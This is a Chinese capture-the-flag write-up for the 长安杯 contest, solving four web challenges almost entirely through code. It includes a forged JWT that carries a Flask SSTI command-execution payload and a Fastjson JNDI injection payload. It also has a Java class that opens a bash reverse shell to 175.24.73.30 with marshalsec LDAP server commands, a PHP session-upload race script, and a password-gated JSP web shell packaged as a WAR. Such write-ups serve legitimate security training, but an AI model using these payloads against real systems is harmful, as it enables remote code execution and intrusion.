长安杯CTF-writeup

  • 长安杯CTF-writeup已关闭评论
  • 49 views
  • A+
所属分类:CTF专场

长安杯CTF-writeup

ezpy

#app.py
from flask import Flask, request, render_template, render_template_string, make_response, redirect, Request, url_for
from cookie import *
import uuid

app = Flask(__name__)

@app.route("/")
def index():
    return render_template("login.html")

@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        user = request.form['user']
        passwd = request.form['passwd']
    payload = {
        "user": user,
        "passwd": passwd,
        "uid": str(uuid.uuid4()),
        "role": "guest"
    }
    response = make_response(redirect(url_for("flag")))
    response.set_cookie("token", generate_jwt(payload, "CTf4r"), max_age=1800)
    return response

@app.route("/flag")
def flag():
    res = verify_jwt(request.cookies.get("token"), "CTf4r")
    print(res)
    if res['role'] == "admin":
        tips = "Hello admin!"
        return render_template_string(render_template("res.html", title="Hello "+res["user"], content=tips))
    else:
        tips = "Sorry, you are not admin!"
        return render_template_string(render_template("res.html", title="Permission denied", content=tips))

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80, debug=0)
#cookie.py
import jwt

def generate_jwt(payload, key):
    return jwt.encode(payload, key=key, algorithm="HS256")

def verify_jwt(mtext, key):
    return jwt.decode(mtext, key=key, algorithms=["HS256"])

jwt爆破得:CTf4r

再ssti

url_for.__globals__.os.popen(request.args.a).read()
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoie3t1cmxfZm9yLl9fZ2xvYmFsc19fLm9zLnBvcGVuKHJlcXVlc3QuYXJncy5hKS5yZWFkKCl9fSIsInBhc3N3ZCI6InRlc3QiLCJ1aWQiOiJhOTU0YjczMS01NGFkLTRiMzUtOGUxMS04ZWM2OTcyN2Q3ZTYiLCJyb2xlIjoiYWRtaW4ifQ.expgqWwyhxIXTRDSIbEvMwmtKjUE-DANHW99Ul8la2M
/flag?a=cat flag

soeasy

参考:https://cloud.tencent.com/developer/article/1553664

{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://175.24.73.30:9999/Exploit",
        "autoCommit":true
    }
}

Exploit.java

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash","-c","bash -i >& /dev/tcp/175.24.73.30/2333 0>&1"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}
javac Exploit.java
python3 -m http.server 8080
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://175.243.30:8080/#Exploit 9999

DaLaBengBa

import io
import sys
import requests
import threading

sessid = 'jan'
sess_path='/tmp'
url='http://f813a9ca.yunyansec.com/'

def WRITE(session):
    while True:
        f = io.BytesIO(b'x' * 1024 * 50)
        session.post(
            url=url,
            data={"PHP_SESSION_UPLOAD_PROGRESS":f"<?=phpinfo();file_get_contents('flag.php');?>"},
            files={"file":('xxx.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{url}?doge[_filename]={sess_path}/sess_{sessid}')
        if 'upload_progress_' in response.text:
            print(response.text)
            sys.exit(0)
        else:
            print('++++++retry++++++')

def main():
    with requests.session() as session:
        t1 = threading.Thread(target=WRITE, args=(session,))
        t1.daemon = True
        t1.start()
        READ(session)
if __name__ == '__main__':
    main()

Old But A Little New

参考:https://pianshen.com/article/38641854149/

生成war包:jar cvf shell.war shell.jsp

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>

传war包,拿flag

/shell/shell.jsp?pwd=admin&cmd=cat flag

results matching ""

    No results matching ""

    相关推荐: pwn-栈溢出2

    pwn-栈溢出2ROP返回导向编程(英语:Return-Oriented Programming,缩写:ROP)是计算机安全中的一种漏洞利用技术,该技术允许攻击者在程序启用了安全保护技术(如堆栈不可执行)的情况下控制程序执行流,执行恶意代码[1]。其核心思想是…